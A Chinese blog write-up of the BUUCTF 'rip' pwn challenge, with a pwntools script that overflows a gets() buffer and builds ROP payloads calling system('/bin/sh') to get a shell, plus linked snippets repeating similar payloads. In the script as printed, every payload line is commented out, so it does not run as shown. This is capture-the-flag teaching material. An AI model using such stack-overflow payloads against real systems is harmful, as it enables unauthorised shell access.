rip(Pwn)

最新推荐文章于 2024-04-26 17:43:46 发布
最新推荐文章于 2024-04-26 17:43:46 发布
阅读量2.3k 收藏 1
点赞数
分类专栏: Pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45913417/article/details/121409047
版权

checksec.png
main.png
pwndbg.png
IDA中SHIFT+F12:
strings.png
漏洞点+后门已获得,开启乱杀之路:

from pwn import *

context.os = 'linux'
context.arch = 'amd64'
context.log_level = 'debug'

# io = process('./pwn1')
io = remote('redirect.do-not-trust.hacking.run', 10368)
elf = ELF('./pwn1')
// 由于该题目没有清除缓冲区,导致recv接收不到回显
# io.recv()

system_addr = elf.symbols['system']

// ROPgadget --binary pwn1 --string '/bin/sh'
bin_sh_addr = 0x0000000000401186
// ROPgadget --binary pwn1 --only 'pop|ret'
pop_rdi_addr = 0x00000000004011fb
ret_addr = 0x0000000000401198

The MOVAPS issue-Pwn-看雪论坛(https://bbs.pediy.com/thread-269597-1.htm)

// 第一个payload利用ret来堆栈平衡
# payload = 'a' * (0x0f+0x08) + p64(ret_addr) + p64(pop_rdi_addr) + p64(bin_sh_addr) + p64(system_addr)

// 前两个payload利用64位程序函数调用参数规则构造
// 寄存器调用顺序:rdi、rsi、rdx、rcx、r8、r9
// 先利用pop+ret将bin_sh_addr地址弹到rdi寄存器中去,再调用system函数来执行
# payload = 'a' * (0x0f+0x08) + p64(pop_rdi_addr) + p64(bin_sh_addr) + p64(system_addr)

// ret堆栈平衡,直接返回bin_sh_addr处也可以获得系统权限。
# payload = 'a' * (0x0f+0x08) + p64(ret_addr) + p64(bin_sh_addr)

// 仅第三个payload打通本地和远程,暂时没发现前两个payload的问题。

io.sendline(payload)
io.interactive()

此题目利用pwndbg能更加深入理解栈空间:
留下一个思考问题:两个红色箭头与栈空间有什么联系?

思考.png

半步行止
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF-Pwn-rip
餐桌上的猫
11-14 2806
题目截图 使用IDA打开附件,反汇编为C语言找到两个函数 可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问题,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节 所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186 所以我们可以构造payload=‘a’*23+
BUUCTF(Pwn) rip
半岛铁盒的博客
03-20 474
按tab键,看一下 fun函数 发现其地址是 0x401186; 但是写EXP不能直接用这个地址,需要使用0x40118A这个地址,system函数是在0x40118A压参数然后执行 from pwn import * p = remote('node3.buuoj.cn', '25677') payload = 'a' * (0xf + 8) + p64(0x40118A) p.sendline(payload) p.interactive() ...
BUUCTF Pwn rip
weixin_41557838的博客
05-27 334
BUUCTF Pwn rip
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4995
BUU CTF PWN 入门知识详解
【BUUCTF - PWNrip
古月浪子的博客
03-19 1630
checksec一下,发现啥保护也没开 IDA打开看看,明显的栈溢出漏洞,IDA给出了s的长度为0xf 发现后门函数 脚本中使用地址0x401186发现不行(不知道为什么),换成0x401187发现可以 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.l...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
[BUUCTF-pwn]——rip
Y_peak的博客
01-30 1208
BUUCTF——rip 题目地址:https://buuoj.cn/challenges 题目: 同样我们现将文件下载下来,在Linux上用checksec 看下信息,发现这是一个64位程序,并且任何保护都没开。???? (任何保护都没开,基本就是栈溢出) 在window用IDA反汇编看看,打扰了main函数没有任何有用的东西,没有我们要找的system函数 看看其他函数看看有没有,功夫不负有心人。fun函数中,有我们想要的东西 赶快查看下fun函数所在的位置 0x401186 。我们看到是在0x
BUU刷题-Pwn-rip
一个啥也不会的小菜鸡!
07-13 280
因为此题出的比较草率,没有考虑关闭缓冲区,please input加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到这字符串,自然就会超时。有后门函数,利用栈溢出(思路没问题,但是远程的环境有问题)里面有详细解释,涉及到[[堆栈平衡]]
CTF buuoj pwn-----第2题:rip
bing_Max的博客
08-28 2655
CTF buuoj pwn-----第2题:rip 记录一下pwn的过程 同第1题一样,新手学习日记,流水线记录. 打开题目,连接靶机,下载文件’ript’ 1. 首先checkesc ,检测文件的保护机制. checksec在下载好pwntools后就有 参考链接: link. 参考链接: link. bing@bing-virtual-machine:~/pwn$ checksec test [*] '/home/bing/pwn/test' Arch: amd64-64-lit
pwnthebox-rip
CHAWUCIREN1的博客
12-02 2586
gets函数不限制输入的长度,存在溢出 查看栈空间,payload = 0xf + 8 发现fun()函数, 构造exp from pwn import * p = process('pwn1') #p = remote('redirect.do-not-trust.hacking.run',10026) payload = b'A'*0xF+ p64(0x401186) p.sendline(payload) p.interactive() ...
BUUCTF-rip 尝试PWN入门
brightendavid的博客
05-04 1535
BUUCTF-rip 拿到的是一个什么呢,感觉是一个小系统? 但是也就是一个小程序嘛。 这个程序就是执行一个输入输出 的命令。但是这里面存在漏洞。 这个s是15byte的字符 在fun部分有一个/bin/sh 这个据说是一个系统级函数,为什么说是系统级函数呢,因为有一个system吧。 一般会是什么用都没有。 但是在使用这样的一个payload后,就可以利用,也不知道这个pwn 库是做了什么。感觉像是变魔术。要刚好把堆栈覆盖到这个系统函数的位置?是不是这个解释呢。 #python3 需要预先安
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2482
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
pwn | BUUCTF rip 1&& pwn基本思路
最新发布
Mintind的博客
04-26 1218
(写得好详细我好爱(为什么payload有两种写法于。
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2501
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
【Writeup】BUUCTF_Pwn_RIP覆盖一下
BAKUMANSEC - Just Do It
08-17 3861
0x01 解题思路 查看文件信息 ​ 没什么防护措施的ELF64文件。 拖入IDA x64,F5 ​ 显然可以通过栈溢出覆盖RIP。 发现命令执行函数 地址为0x401186 利用peda计算输入点距离RIP的偏移值 得出偏移量是23。 现在就可以写出覆盖RIP执行fun函数的EXP了。 0x02 EXP from pwn import * io=0 ...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半步行止

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值